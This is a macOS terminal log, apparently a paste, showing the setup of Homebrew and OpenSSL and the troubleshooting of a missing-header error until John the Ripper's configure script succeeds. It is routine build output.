  2117. ==> /usr/bin/sudo /bin/chmod g+rwx /Users/osx/Library/Caches/Homebrew
  2118. ==> /usr/bin/sudo /usr/sbin/chown osx /Users/osx/Library/Caches/Homebrew
  2119. ==> /usr/bin/sudo /bin/mkdir -p /Library/Caches/Homebrew
  2120. ==> /usr/bin/sudo /bin/chmod g+rwx /Library/Caches/Homebrew
  2121. ==> /usr/bin/sudo /usr/sbin/chown osx /Library/Caches/Homebrew
  2122. ==> Downloading and installing Homebrew...
  2123. remote: Counting objects: 94457, done.
  2124. remote: Compressing objects: 100% (30/30), done.
  2125. remote: Total 94457 (delta 18), reused 28 (delta 13), pack-reused 94413
  2126. Receiving objects: 100% (94457/94457), 21.58 MiB | 2.10 MiB/s, done.
  2127. Resolving deltas: 100% (68543/68543), done.
  2128. From https://github.com/Homebrew/brew
  2129. * [new branch]          master     -> origin/master
  2130. * [new tag]             0.1        -> 0.1
  2131. * [new tag]             0.2        -> 0.2
  2132. * [new tag]             0.3        -> 0.3
  2133. * [new tag]             0.4        -> 0.4
  2134. * [new tag]             0.5        -> 0.5
  2135. * [new tag]             0.6        -> 0.6
  2136. * [new tag]             0.7        -> 0.7
  2137. * [new tag]             0.7.1      -> 0.7.1
  2138. * [new tag]             0.8        -> 0.8
  2139. * [new tag]             0.8.1      -> 0.8.1
  2140. * [new tag]             0.9        -> 0.9
  2141. * [new tag]             0.9.1      -> 0.9.1
  2142. * [new tag]             0.9.2      -> 0.9.2
  2143. * [new tag]             0.9.3      -> 0.9.3
  2144. * [new tag]             0.9.4      -> 0.9.4
  2145. * [new tag]             0.9.5      -> 0.9.5
  2146. * [new tag]             0.9.8      -> 0.9.8
  2147. * [new tag]             0.9.9      -> 0.9.9
  2148. * [new tag]             1.0.0      -> 1.0.0
  2149. * [new tag]             1.0.1      -> 1.0.1
  2150. * [new tag]             1.0.2      -> 1.0.2
  2151. * [new tag]             1.0.3      -> 1.0.3
  2152. * [new tag]             1.0.4      -> 1.0.4
  2153. * [new tag]             1.0.5      -> 1.0.5
  2154. * [new tag]             1.0.6      -> 1.0.6
  2155. * [new tag]             1.0.7      -> 1.0.7
  2156. * [new tag]             1.0.8      -> 1.0.8
  2157. * [new tag]             1.0.9      -> 1.0.9
  2158. * [new tag]             1.1.0      -> 1.1.0
  2159. * [new tag]             1.1.1      -> 1.1.1
  2160. * [new tag]             1.1.10     -> 1.1.10
  2161. * [new tag]             1.1.11     -> 1.1.11
  2162. * [new tag]             1.1.12     -> 1.1.12
  2163. * [new tag]             1.1.13     -> 1.1.13
  2164. * [new tag]             1.1.2      -> 1.1.2
  2165. * [new tag]             1.1.3      -> 1.1.3
  2166. * [new tag]             1.1.4      -> 1.1.4
  2167. * [new tag]             1.1.5      -> 1.1.5
  2168. * [new tag]             1.1.6      -> 1.1.6
  2169. * [new tag]             1.1.7      -> 1.1.7
  2170. * [new tag]             1.1.8      -> 1.1.8
  2171. * [new tag]             1.1.9      -> 1.1.9
  2172. * [new tag]             1.2.0      -> 1.2.0
  2173. * [new tag]             1.2.1      -> 1.2.1
  2174. * [new tag]             1.2.2      -> 1.2.2
  2175. * [new tag]             1.2.3      -> 1.2.3
  2176. * [new tag]             1.2.4      -> 1.2.4
  2177. * [new tag]             1.2.5      -> 1.2.5
  2178. * [new tag]             1.2.6      -> 1.2.6
  2179. * [new tag]             1.3.0      -> 1.3.0
  2180. * [new tag]             1.3.1      -> 1.3.1
  2181. * [new tag]             1.3.2      -> 1.3.2
  2182. * [new tag]             1.3.3      -> 1.3.3
  2183. * [new tag]             1.3.4      -> 1.3.4
  2184. * [new tag]             1.3.5      -> 1.3.5
  2185. * [new tag]             1.3.6      -> 1.3.6
  2186. * [new tag]             1.3.7      -> 1.3.7
  2187. * [new tag]             1.3.8      -> 1.3.8
  2188. HEAD is now at 86305f7d8 Merge pull request #3470 from sjackman/analytics
  2189. ==> Tapping homebrew/core
  2190. Cloning into '/usr/local/Homebrew/Library/Taps/homebrew/homebrew-core'...
  2191. remote: Counting objects: 4642, done.
  2192. remote: Compressing objects: 100% (4422/4422), done.
  2193. remote: Total 4642 (delta 36), reused 322 (delta 10), pack-reused 0
  2194. Receiving objects: 100% (4642/4642), 3.84 MiB | 2.00 MiB/s, done.
  2195. Resolving deltas: 100% (36/36), done.
  2196. Checking out files: 100% (4665/4665), done.
  2197. Tapped 4417 formulae (4,689 files, 12.0MB)
  2198. ==> Cleaning up /Library/Caches/Homebrew...
  2199. ==> Migrating /Library/Caches/Homebrew to /Users/osx/Library/Caches/Homebrew...
  2200. ==> Deleting /Library/Caches/Homebrew...
  2201. Already up-to-date.
  2202. ==> Installation successful!
  2203.  
  2204. ==> Homebrew has enabled anonymous aggregate user behaviour analytics.
  2205. Read the analytics documentation (and how to opt-out) here:
  2206.  https://docs.brew.sh/Analytics.html
  2207.  
  2208. ==> Next steps:
  2209. - Run `brew help` to get started
  2210. - Further documentation:
  2211.    https://docs.brew.sh
  2212.  
  2213.  
  2214.  
  2215.  
  2216.  
  2217.  
  2218.  
  2219.  
  2220. SixMillionKilaTons:src osx$ ./configure
  2221. checking build system type... x86_64-apple-darwin17.2.0
  2222. checking host system type... x86_64-apple-darwin17.2.0
  2223. checking whether to compile using MPI... no
  2224. checking for gcc... gcc
  2225. checking whether the C compiler works... yes
  2226. checking for C compiler default output file name... a.out
  2227. checking for suffix of executables...
  2228. checking whether we are cross compiling... no
  2229. checking for suffix of object files... o
  2230. checking whether we are using the GNU C compiler... yes
  2231. checking whether gcc accepts -g... yes
  2232. checking for gcc option to accept ISO C89... none needed
  2233. checking whether gcc understands -c and -o together... yes
  2234. checking whether we are using the GNU C compiler... (cached) yes
  2235. checking whether gcc accepts -g... (cached) yes
  2236. checking for gcc option to accept ISO C89... (cached) none needed
  2237. checking whether gcc understands -c and -o together... (cached) yes
  2238. checking additional paths...  -L/usr/local/lib -I/usr/local/include
  2239. checking arg check macro for -m with gcc... yes
  2240. checking arg check macro for -Q with gcc... yes
  2241. checking if gcc supports -funroll-loops... yes
  2242. checking if gcc supports -Os... yes
  2243. checking if gcc supports -finline-functions... yes
  2244. checking if gcc supports -Wall... yes
  2245. checking if gcc supports -Wdeclaration-after-statement... yes
  2246. checking if gcc supports -fomit-frame-pointer... yes
  2247. checking if gcc supports --param allow-store-data-races=0... no
  2248. checking if gcc supports -Wno-deprecated-declarations... yes
  2249. checking if gcc supports -Wno-format-extra-args... yes
  2250. checking if gcc supports -Qunused-arguments... yes
  2251. checking whether ln -s works... yes
  2252. checking for grep that handles long lines and -e... /usr/bin/grep
  2253. checking for a sed that does not truncate output... /usr/bin/sed
  2254. checking for GNU make... make
  2255. checking whether make sets $(MAKE)... yes
  2256. checking how to run the C preprocessor... gcc -E
  2257. checking for a thread-safe mkdir -p... ./install-sh -c -d
  2258. checking for sort... /usr/bin/sort
  2259. checking for ar... /usr/bin/ar
  2260. checking for find... /usr/bin/find
  2261. checking for pkg-config... no
  2262. checking if pkg-config will be used... no
  2263. checking for egrep... /usr/bin/grep -E
  2264. checking for ANSI C header files... yes
  2265. checking for sys/types.h... yes
  2266. checking for sys/stat.h... yes
  2267. checking for stdlib.h... yes
  2268. checking for string.h... yes
  2269. checking for memory.h... yes
  2270. checking for strings.h... yes
  2271. checking for inttypes.h... yes
  2272. checking for stdint.h... yes
  2273. checking for unistd.h... yes
  2274. checking size of char... 1
  2275. checking size of unsigned char... 1
  2276. checking size of short... 2
  2277. checking size of unsigned short... 2
  2278. checking size of int... 4
  2279. checking size of unsigned... 4
  2280. checking size of unsigned int... 4
  2281. checking size of long... 8
  2282. checking size of long long... 8
  2283. checking size of double... 8
  2284. checking size of long double... 16
  2285. checking size of int *... 8
  2286. checking size of long long *... 8
  2287. checking size of void *... 8
  2288. configure: Testing build host's native CPU features
  2289. checking for MMX... yes
  2290. checking for SSE2... yes
  2291. checking for SSSE3... yes
  2292. checking for SSE4.1... yes
  2293. checking for AVX... no
  2294. checking for as... /usr/bin/as
  2295. checking that 'as' works for AVX... no
  2296. checking for arch.h alternative... x86-64.h
  2297. checking for 32/64 bit... 64-bit
  2298. checking for extra ASFLAGS...  -DUNDERSCORES -DBSD -DALIGN_LOG
  2299. checking for X32 ABI... no
  2300. checking for unaligned memory access allowed... yes
  2301. checking for byte ordering according to target triple... little
  2302. checking additional paths for OpenSSL... none
  2303. checking openssl/opensslv.h usability... no
  2304. checking openssl/opensslv.h presence... no
  2305. checking for openssl/opensslv.h... no
  2306. configure: error: in `/Applications/john/src':
  2307. configure: error: JtR requires OpenSSL headers being installed
  2308. See `config.log' for more details
  2309.  
  2310.  
  2311.  
  2312.  
  2313.  
  2314.  
  2315. SixMillionKilaTons:src osx$ brew doctor
  2316. Please note that these warnings are just used to help the Homebrew maintainers
  2317. with debugging if you file an issue. If everything you use Homebrew for is
  2318. working fine: please don't worry and just ignore them. Thanks!
  2319.  
  2320. Warning: /usr/local/lib/python2.7/site-packages isn't writable.
  2321. This can happen if you "sudo pip install" software that isn't managed
  2322. by Homebrew. If you install a formula with Python modules, the install
  2323. will fail during the link step.
  2324.  
  2325. You should change the ownership and permissions of /usr/local/lib/python2.7/site-packages
  2326. back to your user account.
  2327.  sudo chown -R $(whoami) /usr/local/lib/python2.7/site-packages
  2328.  
  2329. Warning: Unbrewed dylibs were found in /usr/local/lib.
  2330. If you didn't put them there on purpose they could cause problems when
  2331. building Homebrew formulae, and may need to be deleted.
  2332.  
  2333. Unexpected dylibs:
  2334.   /usr/local/lib/SUVMMFaker.dylib
  2335.  
  2336. Warning: Homebrew's sbin was not found in your PATH but you have installed
  2337. formulae that put executables in /usr/local/sbin.
  2338. Consider setting the PATH for example like so
  2339.  echo 'export PATH="/usr/local/sbin:$PATH"' >> ~/.bash_profile
  2340.  
  2341.  
  2342.  
  2343.  
  2344.  
  2345.  
  2346.  
  2347. SixMillionKilaTons:src osx$ brew update
  2348. Already up-to-date.
  2349.  
  2350.  
  2351. SixMillionKilaTons:src osx$ brew upgrade
  2352.  
  2353.  
  2354. SixMillionKilaTons:src osx$ brew install openssl
  2355. ==> Downloading https://homebrew.bintray.com/bottles/openssl-1.0.2m.high_sierra.
  2356. ######################################################################## 100.0%
  2357. ==> Pouring openssl-1.0.2m.high_sierra.bottle.tar.gz
  2358. ==> Caveats
  2359. A CA file has been bootstrapped using certificates from the SystemRoots
  2360. keychain. To add additional certificates (e.g. the certificates added in
  2361. the System keychain), place .pem files in
  2362.  /usr/local/etc/openssl/certs
  2363.  
  2364. and run
  2365.  /usr/local/opt/openssl/bin/c_rehash
  2366.  
  2367. This formula is keg-only, which means it was not symlinked into /usr/local,
  2368. because Apple has deprecated use of OpenSSL in favor of its own TLS and crypto libraries.
  2369.  
  2370. If you need to have this software first in your PATH run:
  2371.  echo 'export PATH="/usr/local/opt/openssl/bin:$PATH"' >> ~/.bash_profile
  2372.  
  2373. For compilers to find this software you may need to set:
  2374.    LDFLAGS:  -L/usr/local/opt/openssl/lib
  2375.    CPPFLAGS: -I/usr/local/opt/openssl/include
  2376.  
  2377. ==> Summary
  2378. 🍺  /usr/local/Cellar/openssl/1.0.2m: 1,792 files, 12.3MB
  2379.  
  2380.  
  2381.  
  2382.  
  2383.  
  2384. SixMillionKilaTons:src osx$ ./configure
  2385. checking build system type... x86_64-apple-darwin17.2.0
  2386. checking host system type... x86_64-apple-darwin17.2.0
  2387. checking whether to compile using MPI... no
  2388. checking for gcc... gcc
  2389. checking whether the C compiler works... yes
  2390. checking for C compiler default output file name... a.out
  2391. checking for suffix of executables...
  2392. checking whether we are cross compiling... no
  2393. checking for suffix of object files... o
  2394. checking whether we are using the GNU C compiler... yes
  2395. checking whether gcc accepts -g... yes
  2396. checking for gcc option to accept ISO C89... none needed
  2397. checking whether gcc understands -c and -o together... yes
  2398. checking whether we are using the GNU C compiler... (cached) yes
  2399. checking whether gcc accepts -g... (cached) yes
  2400. checking for gcc option to accept ISO C89... (cached) none needed
  2401. checking whether gcc understands -c and -o together... (cached) yes
  2402. checking additional paths...  -L/usr/local/lib -I/usr/local/include
  2403. checking arg check macro for -m with gcc... yes
  2404. checking arg check macro for -Q with gcc... yes
  2405. checking if gcc supports -funroll-loops... yes
  2406. checking if gcc supports -Os... yes
  2407. checking if gcc supports -finline-functions... yes
  2408. checking if gcc supports -Wall... yes
  2409. checking if gcc supports -Wdeclaration-after-statement... yes
  2410. checking if gcc supports -fomit-frame-pointer... yes
  2411. checking if gcc supports --param allow-store-data-races=0... no
  2412. checking if gcc supports -Wno-deprecated-declarations... yes
  2413. checking if gcc supports -Wno-format-extra-args... yes
  2414. checking if gcc supports -Qunused-arguments... yes
  2415. checking whether ln -s works... yes
  2416. checking for grep that handles long lines and -e... /usr/bin/grep
  2417. checking for a sed that does not truncate output... /usr/bin/sed
  2418. checking for GNU make... make
  2419. checking whether make sets $(MAKE)... yes
  2420. checking how to run the C preprocessor... gcc -E
  2421. checking for a thread-safe mkdir -p... ./install-sh -c -d
  2422. checking for sort... /usr/bin/sort
  2423. checking for ar... /usr/bin/ar
  2424. checking for find... /usr/bin/find
  2425. checking for pkg-config... no
  2426. checking if pkg-config will be used... no
  2427. checking for egrep... /usr/bin/grep -E
  2428. checking for ANSI C header files... yes
  2429. checking for sys/types.h... yes
  2430. checking for sys/stat.h... yes
  2431. checking for stdlib.h... yes
  2432. checking for string.h... yes
  2433. checking for memory.h... yes
  2434. checking for strings.h... yes
  2435. checking for inttypes.h... yes
  2436. checking for stdint.h... yes
  2437. checking for unistd.h... yes
  2438. checking size of char... 1
  2439. checking size of unsigned char... 1
  2440. checking size of short... 2
  2441. checking size of unsigned short... 2
  2442. checking size of int... 4
  2443. checking size of unsigned... 4
  2444. checking size of unsigned int... 4
  2445. checking size of long... 8
  2446. checking size of long long... 8
  2447. checking size of double... 8
  2448. checking size of long double... 16
  2449. checking size of int *... 8
  2450. checking size of long long *... 8
  2451. checking size of void *... 8
  2452. configure: Testing build host's native CPU features
  2453. checking for MMX... yes
  2454. checking for SSE2... yes
  2455. checking for SSSE3... yes
  2456. checking for SSE4.1... yes
  2457. checking for AVX... no
  2458. checking for as... /usr/bin/as
  2459. checking that 'as' works for AVX... no
  2460. checking for arch.h alternative... x86-64.h
  2461. checking for 32/64 bit... 64-bit
  2462. checking for extra ASFLAGS...  -DUNDERSCORES -DBSD -DALIGN_LOG
  2463. checking for X32 ABI... no
  2464. checking for unaligned memory access allowed... yes
  2465. checking for byte ordering according to target triple... little
  2466. checking additional paths for OpenSSL... none
  2467. checking openssl/opensslv.h usability... no
  2468. checking openssl/opensslv.h presence... no
  2469. checking for openssl/opensslv.h... no
  2470. configure: error: in `/Applications/john/src':
  2471. configure: error: JtR requires OpenSSL headers being installed
  2472. See `config.log' for more details
  2473.  
  2474.  
  2475.  
  2476.  
  2477.  
  2478.  
  2479.  
  2480.  
  2481.  
  2482. SixMillionKilaTons:src osx$ cd /usr/local/include
  2483.  
  2484.  
  2485. SixMillionKilaTons:include osx$ ln -s ../opt/openssl/include/openssl
  2486.  
  2487.  
  2488.  
  2489. SixMillionKilaTons:include osx$ ls
  2490. openssl
  2491.  
  2492.  
  2493. SixMillionKilaTons:include osx$ cd openssl
  2494.  
  2495.  
  2496.  
  2497. SixMillionKilaTons:openssl osx$ ls
  2498. aes.h       crypto.h    hmac.h      pem.h       ssl.h
  2499. asn1.h      des.h       idea.h      pem2.h      ssl2.h
  2500. asn1_mac.h  des_old.h   krb5_asn.h  pkcs12.h    ssl23.h
  2501. asn1t.h     dh.h        kssl.h      pkcs7.h     ssl3.h
  2502. bio.h       dsa.h       lhash.h     pqueue.h    stack.h
  2503. blowfish.h  dso.h       md4.h       rand.h      symhacks.h
  2504. bn.h        dtls1.h     md5.h       rc2.h       tls1.h
  2505. buffer.h    e_os2.h     mdc2.h      rc4.h       ts.h
  2506. camellia.h  ebcdic.h    modes.h     ripemd.h    txt_db.h
  2507. cast.h      ec.h        obj_mac.h   rsa.h       ui.h
  2508. cmac.h      ecdh.h      objects.h   safestack.h ui_compat.h
  2509. cms.h       ecdsa.h     ocsp.h      seed.h      whrlpool.h
  2510. comp.h      engine.h    opensslconf.h   sha.h       x509.h
  2511. conf.h      err.h       opensslv.h  srp.h       x509_vfy.h
  2512. conf_api.h  evp.h       ossl_typ.h  srtp.h      x509v3.h
  2513.  
  2514.  
  2515.  
  2516.  
  2517.  
  2518.  
  2519.  
  2520.  
  2521.  
  2522.  
  2523. SixMillionKilaTons:openssl osx$ cd /
  2524. SixMillionKilaTons:/ osx$ cd Applications
  2525. SixMillionKilaTons:Applications osx$ cd john
  2526. SixMillionKilaTons:john osx$ cd src
  2527.  
  2528.  
  2529.  
  2530.  
  2531.  
  2532. SixMillionKilaTons:src osx$ ./configure
  2533. checking build system type... x86_64-apple-darwin17.2.0
  2534. checking host system type... x86_64-apple-darwin17.2.0
  2535. checking whether to compile using MPI... no
  2536. checking for gcc... gcc
  2537. checking whether the C compiler works... yes
  2538. checking for C compiler default output file name... a.out
  2539. checking for suffix of executables...
  2540. checking whether we are cross compiling... no
  2541. checking for suffix of object files... o
  2542. checking whether we are using the GNU C compiler... yes
  2543. checking whether gcc accepts -g... yes
  2544. checking for gcc option to accept ISO C89... none needed
  2545. checking whether gcc understands -c and -o together... yes
  2546. checking whether we are using the GNU C compiler... (cached) yes
  2547. checking whether gcc accepts -g... (cached) yes
  2548. checking for gcc option to accept ISO C89... (cached) none needed
  2549. checking whether gcc understands -c and -o together... (cached) yes
  2550. checking additional paths...  -L/usr/local/lib -I/usr/local/include
  2551. checking arg check macro for -m with gcc... yes
  2552. checking arg check macro for -Q with gcc... yes
  2553. checking if gcc supports -funroll-loops... yes
  2554. checking if gcc supports -Os... yes
  2555. checking if gcc supports -finline-functions... yes
  2556. checking if gcc supports -Wall... yes
  2557. checking if gcc supports -Wdeclaration-after-statement... yes
  2558. checking if gcc supports -fomit-frame-pointer... yes
  2559. checking if gcc supports --param allow-store-data-races=0... no
  2560. checking if gcc supports -Wno-deprecated-declarations... yes
  2561. checking if gcc supports -Wno-format-extra-args... yes
  2562. checking if gcc supports -Qunused-arguments... yes
  2563. checking whether ln -s works... yes
  2564. checking for grep that handles long lines and -e... /usr/bin/grep
  2565. checking for a sed that does not truncate output... /usr/bin/sed
  2566. checking for GNU make... make
  2567. checking whether make sets $(MAKE)... yes
  2568. checking how to run the C preprocessor... gcc -E
  2569. checking for a thread-safe mkdir -p... ./install-sh -c -d
  2570. checking for sort... /usr/bin/sort
  2571. checking for ar... /usr/bin/ar
  2572. checking for find... /usr/bin/find
  2573. checking for pkg-config... no
  2574. checking if pkg-config will be used... no
  2575. checking for egrep... /usr/bin/grep -E
  2576. checking for ANSI C header files... yes
  2577. checking for sys/types.h... yes
  2578. checking for sys/stat.h... yes
  2579. checking for stdlib.h... yes
  2580. checking for string.h... yes
  2581. checking for memory.h... yes
  2582. checking for strings.h... yes
  2583. checking for inttypes.h... yes
  2584. checking for stdint.h... yes
  2585. checking for unistd.h... yes
  2586. checking size of char... 1
  2587. checking size of unsigned char... 1
  2588. checking size of short... 2
  2589. checking size of unsigned short... 2
  2590. checking size of int... 4
  2591. checking size of unsigned... 4
  2592. checking size of unsigned int... 4
  2593. checking size of long... 8
  2594. checking size of long long... 8
  2595. checking size of double... 8
  2596. checking size of long double... 16
  2597. checking size of int *... 8
  2598. checking size of long long *... 8
  2599. checking size of void *... 8
  2600. configure: Testing build host's native CPU features
  2601. checking for MMX... yes
  2602. checking for SSE2... yes
  2603. checking for SSSE3... yes
  2604. checking for SSE4.1... yes
  2605. checking for AVX... no
  2606. checking for as... /usr/bin/as
  2607. checking that 'as' works for AVX... no
  2608. checking for arch.h alternative... x86-64.h
  2609. checking for 32/64 bit... 64-bit
  2610. checking for extra ASFLAGS...  -DUNDERSCORES -DBSD -DALIGN_LOG
  2611. checking for X32 ABI... no
  2612. checking for unaligned memory access allowed... yes
  2613. checking for byte ordering according to target triple... little
  2614. checking additional paths for OpenSSL... none
  2615. checking openssl/opensslv.h usability... yes
  2616. checking openssl/opensslv.h presence... yes
  2617. checking for openssl/opensslv.h... yes
  2618. checking for SSL_library_init in -lssl... yes
  2619. checking for MD5_Update in -lcrypto... yes
  2620. checking for sqrt in -lm... yes
  2621. checking for deflate in -lz... yes
  2622. checking for library containing crypt... none required
  2623. checking gmp.h usability... no
  2624. checking gmp.h presence... no
  2625. checking for gmp.h... no
  2626. checking gmp/gmp.h usability... no
  2627. checking gmp/gmp.h presence... no
  2628. checking for gmp/gmp.h... no
  2629. checking skey.h usability... no
  2630. checking skey.h presence... no
  2631. checking for skey.h... no
  2632. checking for S/Key... using our own code
  2633. checking bzlib.h usability... yes
  2634. checking bzlib.h presence... yes
  2635. checking for bzlib.h... yes
  2636. checking for main in -lbz2... yes
  2637. checking for main in -lkernel32... no
  2638. checking for dlopen in -ldl... yes
  2639. checking librexgen/api/c/librexgen.h usability... no
  2640. checking librexgen/api/c/librexgen.h presence... no
  2641. checking for librexgen/api/c/librexgen.h... no
  2642. checking pcap.h usability... yes
  2643. checking pcap.h presence... yes
  2644. checking for pcap.h... yes
  2645. checking for pcap_compile in -lpcap... yes
  2646. checking for pcap.h... (cached) yes
  2647. checking for pcap_compile in -lwpcap... no
  2648. checking whether time.h and sys/time.h may both be included... yes
  2649. checking whether string.h and strings.h may both be included... yes
  2650. checking for EVP_aes_256_xts... yes
  2651. checking for SHA256... yes
  2652. checking for WHIRLPOOL... yes
  2653. checking for RIPEMD160... yes
  2654. checking for AES_encrypt... yes
  2655. checking for EVP_sha512... yes
  2656. checking for BIO_new... yes
  2657. checking for gcc option to support OpenMP... unsupported
  2658. checking additional paths for OpenCL... none
  2659. checking if compiler needs -Werror to reject unknown flags... yes
  2660. checking whether pthreads work with -pthread... yes
  2661. checking for joinable pthread attribute... PTHREAD_CREATE_JOINABLE
  2662. checking if more special flags are required for pthreads... -D_THREAD_SAFE
  2663. checking for PTHREAD_PRIO_INHERIT... yes
  2664. checking whether we are using the Microsoft C compiler... no
  2665. checking CL/cl.h usability... no
  2666. checking CL/cl.h presence... no
  2667. checking for CL/cl.h... no
  2668. checking OpenCL/cl.h usability... yes
  2669. checking OpenCL/cl.h presence... yes
  2670. checking for OpenCL/cl.h... yes
  2671. checking windows.h usability... no
  2672. checking windows.h presence... no
  2673. checking for windows.h... no
  2674. checking for OpenCL library... -Wl,-framework,OpenCL
  2675. checking additional paths for CUDA... none
  2676. checking for nvcc... no
  2677. checking OS.h usability... no
  2678. checking OS.h presence... no
  2679. checking for OS.h... no
  2680. checking arpa/inet.h usability... yes
  2681. checking arpa/inet.h presence... yes
  2682. checking for arpa/inet.h... yes
  2683. checking crypt.h usability... no
  2684. checking crypt.h presence... no
  2685. checking for crypt.h... no
  2686. checking fcntl.h usability... yes
  2687. checking fcntl.h presence... yes
  2688. checking for fcntl.h... yes
  2689. checking limits.h usability... yes
  2690. checking limits.h presence... yes
  2691. checking for limits.h... yes
  2692. checking locale.h usability... yes
  2693. checking locale.h presence... yes
  2694. checking for locale.h... yes
  2695. checking net/ethernet.h usability... yes
  2696. checking net/ethernet.h presence... yes
  2697. checking for net/ethernet.h... yes
  2698. checking netdb.h usability... yes
  2699. checking netdb.h presence... yes
  2700. checking for netdb.h... yes
  2701. checking netinet/in.h usability... yes
  2702. checking netinet/in.h presence... yes
  2703. checking for netinet/in.h... yes
  2704. checking netinet/in_systm.h usability... yes
  2705. checking netinet/in_systm.h presence... yes
  2706. checking for netinet/in_systm.h... yes
  2707. checking stddef.h usability... yes
  2708. checking stddef.h presence... yes
  2709. checking for stddef.h... yes
  2710. checking for stdint.h... (cached) yes
  2711. checking for stdlib.h... (cached) yes
  2712. checking for string.h... (cached) yes
  2713. checking for strings.h... (cached) yes
  2714. checking sys/ethernet.h usability... no
  2715. checking sys/ethernet.h presence... no
  2716. checking for sys/ethernet.h... no
  2717. checking sys/file.h usability... yes
  2718. checking sys/file.h presence... yes
  2719. checking for sys/file.h... yes
  2720. checking sys/param.h usability... yes
  2721. checking sys/param.h presence... yes
  2722. checking for sys/param.h... yes
  2723. checking sys/socket.h usability... yes
  2724. checking sys/socket.h presence... yes
  2725. checking for sys/socket.h... yes
  2726. checking sys/time.h usability... yes
  2727. checking sys/time.h presence... yes
  2728. checking for sys/time.h... yes
  2729. checking sys/timeb.h usability... yes
  2730. checking sys/timeb.h presence... yes
  2731. checking for sys/timeb.h... yes
  2732. checking sys/times.h usability... yes
  2733. checking sys/times.h presence... yes
  2734. checking for sys/times.h... yes
  2735. checking for sys/types.h... (cached) yes
  2736. checking termios.h usability... yes
  2737. checking termios.h presence... yes
  2738. checking for termios.h... yes
  2739. checking for unistd.h... (cached) yes
  2740. checking unixlib/local.h usability... no
  2741. checking unixlib/local.h presence... no
  2742. checking for unixlib/local.h... no
  2743. checking wchar.h usability... yes
  2744. checking wchar.h presence... yes
  2745. checking for wchar.h... yes
  2746. checking for windows.h... (cached) no
  2747. checking for net/if.h... yes
  2748. checking for net/if_arp.h... yes
  2749. checking for netinet/if_ether.h... yes
  2750. checking for netinet/ip.h... yes
  2751. checking for stdbool.h that conforms to C99... yes
  2752. checking for _Bool... yes
  2753. checking for inline... inline
  2754. checking for int32_t... yes
  2755. checking for int64_t... yes
  2756. checking for off_t... yes
  2757. checking for size_t... yes
  2758. checking for ssize_t... yes
  2759. checking for uint16_t... yes
  2760. checking for uint32_t... yes
  2761. checking for uint64_t... yes
  2762. checking for uint8_t... yes
  2763. checking for ptrdiff_t... yes
  2764. checking for error_at_line... no
  2765. checking for stdlib.h... (cached) yes
  2766. checking for unistd.h... (cached) yes
  2767. checking for sys/param.h... (cached) yes
  2768. checking for getpagesize... yes
  2769. checking for working mmap... yes
  2770. checking for pid_t... yes
  2771. checking vfork.h usability... no
  2772. checking vfork.h presence... no
  2773. checking for vfork.h... no
  2774. checking for fork... yes
  2775. checking for vfork... yes
  2776. checking for working fork... yes
  2777. checking for working vfork... (cached) yes
  2778. checking for fseek64... no
  2779. checking for fseeko... yes
  2780. checking for fseeko64... no
  2781. checking for _fseeki64... no
  2782. checking for lseek64... no
  2783. checking for lseek... yes
  2784. checking for ftell64... no
  2785. checking for ftello... yes
  2786. checking for ftello64... no
  2787. checking for _ftelli64... no
  2788. checking for fopen64... no
  2789. checking for _fopen64... no
  2790. checking for memmem... yes
  2791. checking for sleep... yes
  2792. checking for atexit... yes
  2793. checking for endpwent... yes
  2794. checking for floor... yes
  2795. checking for ftruncate... yes
  2796. checking for gethostbyname... yes
  2797. checking for gettimeofday... yes
  2798. checking for inet_ntoa... yes
  2799. checking for isascii... yes
  2800. checking for mkdir... yes
  2801. checking for rmdir... yes
  2802. checking for setenv... yes
  2803. checking for putenv... yes
  2804. checking for strcasecmp... yes
  2805. checking for strncasecmp... yes
  2806. checking for stricmp... no
  2807. checking for strcmpi... no
  2808. checking for _stricmp... no
  2809. checking for _strcmpi... no
  2810. checking for strnicmp... no
  2811. checking for strncmpi... no
  2812. checking for _strnicmp... no
  2813. checking for _strncmpi... no
  2814. checking for strrchr... yes
  2815. checking for strcspn... yes
  2816. checking for strspn... yes
  2817. checking for strtol... yes
  2818. checking for strtoul... yes
  2819. checking for strlwr... no
  2820. checking for strupr... no
  2821. checking for bzero... yes
  2822. checking for atoll... yes
  2823. checking for _atoi64... no
  2824. checking for snprintf... yes
  2825. checking for sprintf_s... no
  2826. checking for yasm that supports "--prefix=_ -f macho64"...
  2827. checking for OS-specific feature macros needed... none
  2828. checking size of size_t... 8
  2829. checking size of off_t... 8
  2830. configure: creating ./john_build_rule.h
  2831. configure: creating ./config.status
  2832. config.status: creating Makefile
  2833. config.status: creating aes/Makefile
  2834. config.status: creating aes/aesni/Makefile
  2835. config.status: creating aes/openssl/Makefile
  2836. config.status: creating escrypt/Makefile
  2837. config.status: creating autoconfig.h
  2838. config.status: linking x86-64.h to arch.h
  2839. config.status: executing default commands
  2840. configure: creating ./fmt_externs.h
  2841. configure: creating ./fmt_registers.h
  2842. checking for john.local.conf... not found
  2843. configure: creating ../run/john.local.conf (with skeleton sections)
  2844. configure: WARNING: **************************************************
  2845. configure: WARNING: * System's 'as' can't assemble AVX instructions. *
  2846. configure: WARNING: * Fixing this may yield better performance.      *
  2847. configure: WARNING: * See last section of doc/INSTALL                *
  2848. configure: WARNING: **************************************************
  2849.  
  2850. Configured for building John the Ripper 1.8.0-jumbo-1:
  2851.  
  2852. Target CPU .................................. x86_64 SSE4.1, 64-bit LE
  2853. AES-NI support .............................. depends on OpenSSL
  2854. Target OS ................................... darwin17.2.0
  2855. Cross compiling ............................. no
  2856. Legacy arch header .......................... x86-64.h
  2857. OpenMPI support (default disabled) .......... no
  2858. Fork support ................................ yes
  2859. OpenMP support .............................. no
  2860. OpenCL support .............................. yes
  2861. CUDA support ................................ no
  2862. Generic crypt(3) format ..................... yes
  2863.  
  2864. Optional libraries found:
  2865. Rexgen (extra cracking mode) ................ no
  2866. GMP (performance for SRP formats) ........... no
  2867. PCAP (vncpcap2john and SIPdump) ............. yes
  2868. BZ2 (gpg2john extra decompression logic) .... yes
  2869.  
  2870. Development options (these may hurt performance when enabled):
  2871. Memdbg memory debugging settings ............ disabled
  2872. AddressSanitizer ("ASAN") ................... disabled
  2873.  
  2874. Install missing libraries to get any needed features that were omitted.
  2875.  
  2876. Configure finished.  Now 'make clean && make -s' to compile.
  2877.  
  2878.  
  2879.  
  2880.  
  2881.  
  2882.  
  2883.  
  2884.  
  2885.  
  2886.  
  2887. SixMillionKilaTons:src osx$ make clean
